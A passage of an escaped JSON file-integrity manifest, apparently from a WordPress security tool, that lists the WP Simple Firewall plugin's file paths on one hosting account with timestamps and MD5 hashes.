lugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_notes.php\":{\"d\":1567917025,\"h\":\"09d9e5749e0abc75400eac04ae4ec08f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/usermanagement_suspend.php\":{\"d\":1567917025,\"h\":\"f485de78e80a231ec42b32c92ca28f02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_wordpress.php\":{\"d\":1567917025,\"h\":\"da22bb76cb0617666a5cb01552a93ac8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin.php\":{\"d\":1567917025,\"h\":\"d88001694d72ebc5653dcde15b600f1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_themes.php\":{\"d\":1567917025,\"h\":\"d3ab143486e928f5620f3c5a4399454a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/statistics.php\":{\"d\":1567917025,\"h\":\"9cf498e11fce69db5f6bcd162629ff9f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/base_wpsf.php\":{\"d\":1567917025,\"h\":\"548d9139c08b6e234d7be5d158880f60\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_auditor.php\":{\"d\":1567917025,\"h\":\"670778b7bf3d8ee4cc5fea7159b595c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/admin_access_restriction.php\":{\"d\":1567917025,\"h\":\"244b5d517359a8c2772ff04866398882\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_base.php\":{\"d\":1567917025,\"h\":\"4b4bddfbf22f4de944d06de0ea25fe65\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/traffic_logger.php\":{\"d\":1567917025,\"h\":\"c745e5506d8b01039c60f03376b2f495\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/statistics_tally.php\":{\"d\":1567917025,\"h\":\"9738fdbe8b714945067bbd29de95e122\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_emails.php\":{\"d\":1567917025,\"h\":\"33c5081c3e63690a041f37071fb02992\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intentprovider_backup.php\":{\"d\":1567917025,\"h\":\"8dc8f68269188bef8fbb7f683ef17282\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_apc.php\":{\"d\":1567917025,\"h\":\"5ce7fbe9189c518d3492d3c0f570f6d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intentprovider_ga.php\":{\"d\":1567917025,\"h\":\"0aedd19c7e0f62267078735e152abf03\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_googlerecaptcha.php\":{\"d\":1567917025,\"h\":\"221e58b1f9f7794b469d20d45f317aaa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/commentsfilter_botspam.php\":{\"d\":1567917025,\"h\":\"155cdb22c0c072a4a9c66df40ccba7ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intentprovider_base.php\":{\"d\":1567917025,\"h\":\"085786b514cee724a91b92fc1d60f6b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/license.php\":{\"d\":1567917025,\"h\":\"e06e9f124e6a3c896442646d86cc43b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/events.php\":{\"d\":1567917025,\"h\":\"f1de87a0288e1dcf00a4f133da70109c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_cronhourly.php\":{\"d\":1567917025,\"h\":\"e6cfbac8062fbf9bb0a48d54e3f31896\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/insights.php\":{\"d\":1567917025,\"h\":\"ffd3a8b00c3d93efeb981ad1363db9b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/base.php\":{\"d\":1567917025,\"h\":\"331372d9c8562b855b63c1cbf1da7a75\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intent_tracker.php\":{\"d\":1567917025,\"h\":\"5b408ffb32bdf87fff059f782600139d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/base_plugin.php\":{\"d\":1567917025,\"h\":\"20da0b58a7304090d4f54f1f034c1e7a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/ips.php\":{\"d\":1567917025,\"h\":\"be93c0d13db2a33fd8d0bec090e8661f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intentprovider_email.php\":{\"d\":1567917025,\"h\":\"18e2d182415c6379d10558a0a572cbcc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/traffic.php\":{\"d\":1567917025,\"h\":\"bbed21ce69c0e26ed90434fc9723fdca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail.php\":{\"d\":1567917025,\"h\":\"97b2e8f11ee31d1f2b6f32f26967a567\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/autoupdates.php\":{\"d\":1567917025,\"h\":\"5c114d36e682a838bcb6cef05061d808\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/comments_filter.php\":{\"d\":1567917025,\"h\":\"54bab9789f6e645f34629b23c6188b0d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_changetracking.php\":{\"d\":1567917025,\"h\":\"e5689c87a8b8921f89553f4ab83a9a59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_mal.php\":{\"d\":1567917025,\"h\":\"b6248fa76a3037baf56aef67731727bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_wplogin.php\":{\"d\":1567917025,\"h\":\"07a8f986406150bc59e57c546053d5df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/commentsfilter_antibotspam.php\":{\"d\":1567917025,\"h\":\"20bf1b024689b1f8e2c8805f84a5c452\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_realtime.php\":{\"d\":1567917025,\"h\":\"5b58304debf55e9ab9e1a4cd13567154\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/base_commentsfilter.php\":{\"d\":1567917025,\"h\":\"79a0106691662bd34a57dc6f366c6353\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hack_protect.php\":{\"d\":1567917025,\"h\":\"6318c5459da1bc44b0f87789a4ec9391\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_posts.php\":{\"d\":1567917025,\"h\":\"6e960535edb860b86edc9c1c65c450ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/basedb.php\":{\"d\":1567917025,\"h\":\"d9105d3adf15d579ab74bdc71f832290\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intentprovider_yubikey.php\":{\"d\":1567917025,\"h\":\"380cd3b17e438cf4bcafe7abfa80f3c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/adminaccess_whitelabel.php\":{\"d\":1567917025,\"h\":\"f8159966a1c270c882166ab729aa42f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_integrity.php\":{\"d\":1567917025,\"h\":\"9fe4aa79672e6b447c4e8cbcb3378ee6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_wcf.php\":{\"d\":1567917025,\"h\":\"392232b16d6e9d4e6412bc5f5a155eda\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_users.php\":{\"d\":1567917025,\"h\":\"6066204822238df8a4973e984e9f5fa9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/lockdown.php\":{\"d\":1567917025,\"h\":\"369592f57b6d5940e8d43c4b823b8828\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/sessions.php\":{\"d\":1567917025,\"h\":\"2aa792593e098bc047f7beb993db35b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_intent.php\":{\"d\":1567917025,\"h\":\"f42d8dacc0f0639b709350a06070fabb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_geoip.php\":{\"d\":1567917025,\"h\":\"7f555439b645df8092aba13aab355c52\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/login_protect.php\":{\"d\":1567917025,\"h\":\"cb963f224ff1709d49a2411cfb389847\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_importexport.php\":{\"d\":1567917025,\"h\":\"6ff70740fc705a5ed93d43c9afb79e25\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/usermanagement_passwords.php\":{\"d\":1567917025,\"h\":\"d47631a536375dd1f0dbffd10c3f33ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_base.php\":{\"d\":1567917025,\"h\":\"031610fabafc6723585390fcb76a24bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_plugins.php\":{\"d\":1567917025,\"h\":\"f684fce79ba9b562ef0fc6967c7fcbc9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/user_management.php\":{\"d\":1567917025,\"h\":\"1f34578e1956265b3b2cb033e245021a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/firewall.php\":{\"d\":1567917025,\"h\":\"aededa4a8d11208a01d2f6eef09d41da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_wpsf.php\":{\"d\":1567917025,\"h\":\"4bd2dbba329bc95b8415507875f93e1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpupgrades.php\":{\"d\":1567917025,\"h\":\"7fda37b516b6b82509523a4a68f9f527\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-data.php\":{\"d\":1567917025,\"h\":\"72c626e5263739d68631209af3325079\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-edd.php\":{\"d\":1567917025,\"h\":\"67af13c61195e6047222d4c900f795dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-serviceproviders.php\":{\"d\":1567917025,\"h\":\"318d5d6aee63d8197f1a2cfce39d4146\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/wp-users.php\":{\"d\":1567917025,\"h\":\"9ec6b9d57e44e6f5818cc159e43f47fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-request.php\":{\"d\":1567917025,\"h\":\"52114122e97c55e16e21420d6b538a0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpfunctions-themes.php\":{\"d\":1567917025,\"h\":\"922ecee4cffac418ecab5a8d0af7b32c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-render.php\":{\"d\":1567917025,\"h\":\"c7ad85e2bf56b918cdbad0cf61a9db95\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/wp-admin-notices.php\":{\"d\":1567917025,\"h\":\"7d41caf0c40d69f35b98d8c639af3192\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-foundation.php\":{\"d\":1567917025,\"h\":\"531fff2bc03ff72d9407103aab81c9a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/wp-comments.php\":{\"d\":1567917025,\"h\":\"7078c3d0aa7c299547e64538c3e15c21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpincludes.php\":{\"d\":1567917025,\"h\":\"75e12def43672771d60fdb472adf1673\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpdb.php\":{\"d\":1567917025,\"h\":\"8aec2a5c5e92c5ae7da97c44b961d597\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpfunctions.php\":{\"d\":1567917025,\"h\":\"45e45a961fe19529f7430fd1e2ad16c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-optionsvo.php\":{\"d\":1567917025,\"h\":\"e75a11d888d970152d3eade30c5bebd6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/wp-widget.php\":{\"d\":1567917025,\"h\":\"29d5164f85ee3c422eb075388c132a3b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpfilesystem.php\":{\"d\":1567917025,\"h\":\"047d250f5fe8e7f34f262995dc6a2648\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpcron.php\":{\"d\":1567917025,\"h\":\"bf30ce36ba56b09c184fb9581d120ff7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/common\\/icwp-wpfunctions-plugins.php\":{\"d\":1567917025,\"h\":\"95a3e6cc6ba55e61a1ff4164426ede48\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/wizards\\/plugin.php\":{\"d\":1567917025,\"h\":\"b92ed30a101275ce9eecebe5ac185cf7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/wizards\\/base_wpsf.php\":{\"d\":1567917025,\"h\":\"3eadedd2e8aa36e3d3fe75b818a5e0f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/wizards\\/base.php\":{\"d\":1567917025,\"h\":\"c36cab4cce0d0a49da37eefeeed2d99d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/wizards\\/login_protect.php\":{\"d\":1567917025,\"h\":\"bae81be2d43a40a20230f843c98dc402\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-headers.php\":{\"d\":1567917025,\"h\":\"9da0d897bdc656a47dce4d615ba1073a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-insights.php\":{\"d\":1567917025,\"h\":\"cc39a0b1476f342a91355ff43f4709ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-login_protect.php\":{\"d\":1567917025,\"h\":\"91455d6b5560abada8d6eb6eafb246b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-user_management.php\":{\"d\":1567917025,\"h\":\"d45fc9cc72c95bc0d89ca402d21c2d86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-statistics.php\":{\"d\":1567917025,\"h\":\"12db983fa259c6fbbb77d0cb18502b5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-admin_access_restriction.php\":{\"d\":1567917025,\"h\":\"2b2e3448daa559c185039e00dcc90f7f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-plugin.php\":{\"d\":1567917025,\"h\":\"bbd7fc8c20303904b0436b49078306a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-hack_protect.php\":{\"d\":1567917025,\"h\":\"10395206a833447ff1ae9f76afe707f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-email.php\":{\"d\":1567917025,\"h\":\"08f30716b651da5c08761ac82b7a0c62\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-firewall.php\":{\"d\":1567917025,\"h\":\"5dbe54ca4981622cb3fa1da02e832717\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-comments_filter.php\":{\"d\":1567917025,\"h\":\"28c79654cccca05e82aa0e54307c99ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-sessions.php\":{\"d\":1567917025,\"h\":\"b840f2ec187767135d95836a43f1764a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-audit_trail.php\":{\"d\":1567917025,\"h\":\"c1a0bf3aab91499c1621fa2405e38a57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-traffic.php\":{\"d\":1567917025,\"h\":\"10d1140bb076440a2f2a8d815a73f16d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-events.php\":{\"d\":1567917025,\"h\":\"afccf2102481899951c6ce667d1a1dfa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/changelog.json\":{\"d\":1567917025,\"h\":\"fb2f818a0db3f20c177a70a3a55a72bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-autoupdates.php\":{\"d\":1567917025,\"h\":\"57341906c57ec7881f7600d99b725d01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-license.php\":{\"d\":1567917025,\"h\":\"2c56da9a1ddf1de0748d7b40b7377a37\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-ips.php\":{\"d\":1567917025,\"h\":\"92de1d67d03b88d9eebc55aff75ddd8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/config\\/feature-lockdown.php\":{\"d\":1567917025,\"h\":\"1a06a360f5b4e9d1b91d927e4fbb482e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/L33tMatch.php\":{\"d\":1567917025,\"h\":\"870eeb25b9ba5d55b90d20706adcf95f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/YearMatch.php\":{\"d\":1567917025,\"h\":\"3bef04ae6aac9c3324ec5dc1807fc3e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/adjacency_graphs.json\":{\"d\":1567917025,\"h\":\"77457e18f6b89a4df7d12529ffe12ace\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/frequency_lists.json\":{\"d\":1567917025,\"h\":\"095c74dd21b73aa57822bbfdc2755065\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/RepeatMatch.php\":{\"d\":1567917025,\"h\":\"49a0ff1bac4b9288c278cd4b71b9a6e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/DateMatch.php\":{\"d\":1567917025,\"h\":\"4c06dd9de8e34b064372c4413bce2ab4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/Bruteforce.php\":{\"d\":1567917025,\"h\":\"ea542b6792759b21d79bccd45d65e187\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/DictionaryMatch.php\":{\"d\":1567917025,\"h\":\"833e5b1865981362c18d6deeb0ecb255\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/MatchInterface.php\":{\"d\":1567917025,\"h\":\"7bd42ec568c877befcd2deaa273c3bbc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/SequenceMatch.php\":{\"d\":1567917025,\"h\":\"96430dffbed14b9536e81309cb1fd6a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/SpatialMatch.php\":{\"d\":1567917025,\"h\":\"b08e72968a1be965895d407ab49a340c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/Match.php\":{\"d\":1567917025,\"h\":\"d6377ef872f9e530d7e46a1ca8ece410\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matchers\\/ReverseDictionaryMatch.php\":{\"d\":1567917025,\"h\":\"db8f303db500865c6175c1f51492252e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Scorer.php\":{\"d\":1567917025,\"h\":\"3b8b581db97159886d324dbebb38f152\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Matcher.php\":{\"d\":1567917025,\"h\":\"14d71892e2b854a47e4d4e1dfc490d6e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Zxcvbn.php\":{\"d\":1567917025,\"h\":\"5e4867181f682e1b97cc2205b2036e83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/TimeEstimator.php\":{\"d\":1567917025,\"h\":\"a9573698680a2bcb7c0b5809ab4b4884\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/custom\\/mkopinsky\\/zxcvbn-php\\/src\\/Feedback.php\":{\"d\":1567917025,\"h\":\"1e7f8cba76f396a7d932944ecd33c2c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Exception\\/InvalidServiceIdentifierException.php\":{\"d\":1567917024,\"h\":\"2dc56ac7feb866f7361fdfbaf2cafd57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Exception\\/FrozenServiceException.php\":{\"d\":1567917024,\"h\":\"7555b2e4ae4c277e56c08da33cf40443\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Exception\\/UnknownIdentifierException.php\":{\"d\":1567917024,\"h\":\"55390d6d7b50e403d05b6b1a7c144bf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Exception\\/ExpectedInvokableException.php\":{\"d\":1567917024,\"h\":\"065c95be5677c6a2f843285963b8ee9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Psr11\\/Container.php\":{\"d\":1567917024,\"h\":\"4411acca76925cc4e94bc470d161e189\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Psr11\\/ServiceLocator.php\":{\"d\":1567917024,\"h\":\"6a33f32873d78b1808bd43be9a4392c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/ServiceProviderInterface.php\":{\"d\":1567917024,\"h\":\"18486f1b6cde60410f53c9be072360db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/pimple\\/pimple\\/src\\/Pimple\\/Container.php\":{\"d